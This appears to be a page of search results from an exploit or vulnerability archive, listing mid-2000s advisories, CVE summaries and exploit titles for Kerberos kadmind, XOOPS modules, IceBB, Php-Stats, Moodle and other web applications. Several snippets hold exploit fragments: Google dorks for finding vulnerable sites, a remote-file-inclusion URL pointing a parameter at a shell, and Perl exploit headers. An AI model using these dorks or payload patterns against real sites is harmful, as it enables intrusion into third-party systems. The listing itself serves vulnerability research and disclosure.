6697 matches found
Kerberos 1.5.1 - Kadmind Buffer Overflow
Kerberos 1.5.1 - Kadmind Buffer Overflow Kerberos Version 1.5.1 Kadmind Remote Root Buffer Overflow Vulnerability The Issue: Remotely exploitable buffer overflow vulnerability in Kerberos kadmind service The Versions: krb5-1.5.1 Latest version from http://eb.mit.edu/Kerberos/ krb5-server-1.4.3-5....
SmodCMS 2.10 - Slownik ssid SQL Injection
SmodCMS 2.10 - Slownik ssid SQL Injection 126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $exa.=" ".dechexord$string$i; else $exa.=" 0".dechexord$string$i; $cont++;if $cont==15 $cont=0; $result.="\r\n"; $exa.="\r\n"; return $exa."\r\n".$result; $proxyregex = '...
xoopszmag-sql.txt
!/usr/bin/perl Script Name: XOOPS Module Zmagazine 1.0 print.php Remote BLIND SQL Injection Exploit Coded by : ajann Author : ajann Contact : : Dork : "inurl:/modules/zmagazine/" Result:20.800 Example S. : http://www.google.com.tr/search?q=inurl:/modules/zmagazine/&hl=tr&start=0&sa=N S.Page :...
2bgal-rfi.txt
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= 2BGal 3.1.1 Code: require$langfilename; =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= ExploiT: wWw.site.cOm/path/admin/index.php?langfilename= BorN-SHell wWw.site.cOm/path/admin/backupdb.inc.php?langfilename= BorN-SHell...
CVE-2006-7189
CVE-2006-7189 describes a cross-site scripting (XSS) vulnerability in the web-app.net WebAPP product, specifically in the shell path CGI-bin/admin/logs.cgi, prior to version 20060403. The flaw allows remote attackers to inject arbitrary web script or HTML through unspecified vectors related to th...
Update: ViewCVS and ViewVC 'checkout view' content type fixation issue
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Hi! Moritz Naumann wrote: This does not impact how much the rest of my report applies. My findings are now being discussed on the ViewVC developers mailing list 1. They apparently also impact ViewVC. Whether and to which degree what I am reporting c...
IceBB 1.0-rc5 Remote Create Admin Exploit
No description provided by source. !/usr/bin/perl IceBB 1.0-rc5 Remote Create Admin Exploit 1. register a user 2. run this exploit with this usage : $perl xpl.pl host&path uname pass 3. login with admin access : - magicquotesgpc = Off Coded & Discovered By Hessam-x / Hessamx-at-Hessamx.net use...
XOOPS Module Friendfinder <= 3.3 (view.php id) SQL Injection Exploit
Exploit for unknown platform in category web applications ==================================================================== XOOPS Module Friendfinder : "; $dir = ; chop $dir; if $dir = /exit/ print "-- Exploit FailedYou Are Exited \n"; exit; if $dir = /// else print "-- Exploit FailedNo DIR...
Mephisto blog is vulnerable to XSS
Hello everyone! Current bleeding-edge version of Mephisto blog is vulnerable to XSS. Comment's author name accept javascript code. If admin approves/ rejects comments manually, he have to load all unapproved comments, so it's possible to fetch his session id. Example Add new comment with the...
IceBB 1.0-rc5 Remote Create Admin Exploit
Exploit for unknown platform in category web applications ========================================= IceBB 1.0-rc5 Remote Create Admin Exploit ========================================= !/usr/bin/perl IceBB 1.0-rc5 Remote Create Admin Exploit 1. register a user 2. run this exploit with this usage :...
PBlang <= 4.66z Remote Create Admin Exploit
Exploit for unknown platform in category web applications =========================================== PBlang new or die; $cookiejar = HTTP::Cookies-new; $xpl-cookiejar $cookiejar ; register $reg = $xpl-post$url.'register.php?reg=2', Content = "user" = $uname, "pass" = $passwd, "pass2" = $passwd,...
CVE-2007-1603
admin/contest.php in Weekly Drawing Contest 0.0.1 allows remote attackers to bypass authentication, and insert new contest information into a database, via a direct POST request...
CVE-2007-1554
CVE-2007-1554 affects Guestbara (version 1.2 and earlier) with a direct static code injection vulnerability in admin/configuration.php. The issue allows remote authenticated users to inject arbitrary PHP code into config.php by manipulating parameters (admin_mail, emotpatch, login, pass, and othe...
ScriptMagix FAQ Builder <= 2.0 (index.php) Remote SQL Injection Exploit
No description provided by source. !/usr/bin/perl Script Name: ScriptMagix FAQ Builder = 2.0 index.php Remote Blind SQL Injection Exploit Coded by : ajann Author : ajann Contact : : S.Page : http://www.scriptmagix.com $$ : 50$ .. : ajann,Turkey use IO::Socket; if@ARGV 1 print "...
PHP-Stats 0.1.9.1b - PHP-stats-options.php Command Execution
PHP-Stats 0.1.9.1b - PHP-stats-options.php Command Execution ?php printr' --------------------------------------------------------------------------- Php-Stats = 0.1.9.1b admin 2 exec exploit by rgod mail: retrog at alice dot it site: http://retrogod.altervista.org dork example:...
DirectAdmin Cross Site Scripting XSS
-=Fusi0n Group=- Script name .....: DirectAdmin Script site .....: http://directadmin.com Release Date ....: 15/03/2007 Version .........: All Find by .........: Mandr4ke Contact .........: Mandr4ke.rootatgmail.com Greetings .......: Fusi0nGroup & DevilTeam & Nof...
Php-Stats <= 0.1.9.1b (php-stats-options.php) admin 2 exec() eExploit
No description provided by source. ?php printr' --------------------------------------------------------------------------- Php-Stats = 0.1.9.1b admin 2 exec exploit by rgod mail: retrog at alice dot it site: http://retrogod.altervista.org dork example: inurl:php-stats.js.php...
Php-Stats <= 0.1.9.1b (php-stats-options.php) admin 2 exec() eExploit
Exploit for unknown platform in category web applications ===================================================================== Php-Stats = 0.1.9.1b php-stats-options.php admin 2 exec eExploit ===================================================================== ?php printr'...
CVE-2007-1429
Multiple PHP remote file inclusion vulnerabilities in Moodle 1.7.1 allow remote attackers to execute arbitrary PHP code via a URL in the cmd parameter to 1 admin/utfdbmigrate.php or 2 filter.php...
CVE-2007-1429
CVE-2007-1429 affects Moodle 1.7.1, exposing remote PHP code execution via remote file inclusion. The vulnerability allows an attacker to supply a URL in the cmd parameter to either admin/utfdbmigrate.php or filter.php, leading to arbitrary code execution on the server. Multiple connected sources...